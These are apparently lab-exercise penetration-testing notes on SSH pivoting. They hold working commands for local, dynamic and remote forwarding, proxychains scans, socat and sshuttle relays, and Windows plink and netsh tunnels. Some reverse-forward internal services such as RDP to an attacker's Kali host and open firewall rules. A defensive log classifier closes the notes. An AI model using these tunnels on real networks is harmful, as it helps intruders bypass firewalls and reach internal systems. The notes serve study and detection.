
Vishal SSH Tunneling Note

The document provides instructions for various SSH tunneling techniques including local, dynamic, and remote port forwarding. It details command examples for setting up these tunnels in different environments, such as Confluence and Windows, and highlights the use of proxychains for routing traffic. Additionally, it covers firewall considerations and commands for configuring port proxies on Windows systems.

Uploaded by

davas40587

ssh

Local port forwarding


ssh -L 3306:localhost:3306 [email protected]

ssh -L 0.0.0.0:4242:172.16.191.217:4242 [email protected]


From confluence we did SSH tunneling, where 0.0.0.0 is the local listen address on confluence (all interfaces). We told pgdatabase to tunnel port 445 of 172.16.191.217 to confluence, and then we can listen on port 4455 on confluence.

ssh -L localip:4455:3'rd_ip_inthelist:445 [email protected]

Dynamic port forwarding

Steps:
1. Connect to confluence and spawn a TTY shell.
2. ssh -N -D 0.0.0.0:9999 [email protected] [This command listens on all the local interfaces and gives access to the IPs connected to the host 10.4.50.215]
3. tail /etc/proxychains4.conf
4. socks5 192.168.50.63 9999 [write this as the last line of the proxychains file]
5. This ensures that all the traffic goes through this port on this IP, so we can send our data directly to 10.4.50.215, which helps us scan the IPs connected to 10.4.50.215.
6. But remember, for it to work we have to put the proxychains command before tools like smbclient or nmap.
7. proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
8. proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

Remote port forward


In this section we deal with the firewall, as we cannot connect to any other dynamic port on confluence1 because of the hardware-based and software-based firewall that is configured.
So we connect to confluence with the CVE and then remotely forward a port from inside confluence.

ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 [email protected]


ssh -N -R 127.0.0.1:5985:172.16.229.10:5985 [email protected]

ssh -N -R ip_to_forward_to_in_above_case_we_Forwarded_to_localhost_of_kali:2345:Which_ips_you_want_to_forward_like.which_are_connected_to_confluence1:5432 kali@Your_kali_ip

Remote dynamic port forwarding

Here we just need the -R switch to dynamically tunnel all the interfaces of confluence1.

ssh -N -R 9999 [email protected]

tail /etc/proxychains4.conf
socks5 127.0.0.1 9999 {Try socks4 if socks5 doesn't work}

sshuttle

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 [This connects pgdatabase to confluence1, meaning it tunnels port 22 of pgdatabase to port 2222 on confluence]

sshuttle -r [email protected]:2222 10.4.50.0/24 172.16.50.0/24

Windows ssh tunnel

where ssh
ssh.exe -N -R 9999 [email protected]

Windows plink tunnel

Download plink.exe to the target machine.

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

[127.0.0.1:9833 is the kali local port and host] [127.0.0.1:3389 is the target IP and port that we want to tunnel] [192.168.118.4 is kali's IP]

Windows netsh

This should be run as administrator.

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

If the firewall is present, then use this after the above command:

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow
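
For defenders reviewing process-creation logs, the command shapes in these notes (ssh/plink with -L, -R or -D, socat relays, netsh portproxy, sshuttle) are distinctive enough to flag. The classifier below is an added example, not part of the original notes; the function names, host names and sample records are constructed for illustration, and it assumes whitespace-separated command lines with uncombined flags.

```python
import ntpath
# What each OpenSSH/plink forwarding flag opens.
SSH_FLAGS = {"-L": "local forward", "-R": "remote forward", "-D": "dynamic SOCKS forward"}
WILDCARD_BINDS = {"0.0.0.0", "*"}

def classify(cmdline):
    """Return a list of findings for one process command line."""
    tokens = cmdline.split() or [""]
    exe = ntpath.basename(tokens[0]).lower().replace(".exe", "")  # handles / and \
    lowered = [t.lower() for t in tokens]
    findings = []
    if exe in ("ssh", "plink"):
        for i, tok in enumerate(tokens[1:], start=1):
            flag = tok[:2]
            if flag not in SSH_FLAGS:
                continue
            # The spec is glued to the flag (-L3306:...) or is the next token.
            spec = tok[2:] or (tokens[i + 1] if i + 1 < len(tokens) else "")
            parts = spec.split(":")
            kind = SSH_FLAGS[flag]
            if flag == "-R" and len(parts) <= 2:
                kind = "remote dynamic SOCKS forward"  # -R [bind:]port, no target
            if len(parts) in (2, 4) and parts[0] in WILDCARD_BINDS:
                kind += ", listener on all interfaces"
            findings.append(f"{exe}: {kind} ({spec})")
    elif exe == "socat" and any(t.startswith("tcp-listen:") for t in lowered):
        findings.append("socat: TCP listener relaying to another address")
    elif exe == "netsh" and "portproxy" in lowered and "add" in lowered:
        findings.append("netsh: portproxy rule added")
    elif exe == "sshuttle":
        findings.append("sshuttle: VPN-style tunnel over SSH")
    return findings

# Constructed process-creation records (host, command line); names are made up.
SAMPLE_EVENTS = [
    ("confluence01", "ssh -N -D 0.0.0.0:9999 user@db.example"),
    ("confluence01", "ssh -N -R 9999 user@jump.example"),
    ("confluence01", "socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22"),
    ("win-app01", r"C:\Windows\Temp\plink.exe -ssh -l user -pw REDACTED "
                  r"-R 127.0.0.1:9833:127.0.0.1:3389 192.0.2.10"),
    ("win-app01", "netsh interface portproxy add v4tov4 listenport=2222 "
                  "listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215"),
    ("win-app01", "ssh.exe user@files.example"),  # plain login, no forwarding
]

def scan(events):
    return [(host, f) for host, cmd in events for f in classify(cmd)]

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
```

On the server side, the matching controls are the sshd_config options AllowTcpForwarding, GatewayPorts and PermitOpen, which restrict what these forwards can bind and reach.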
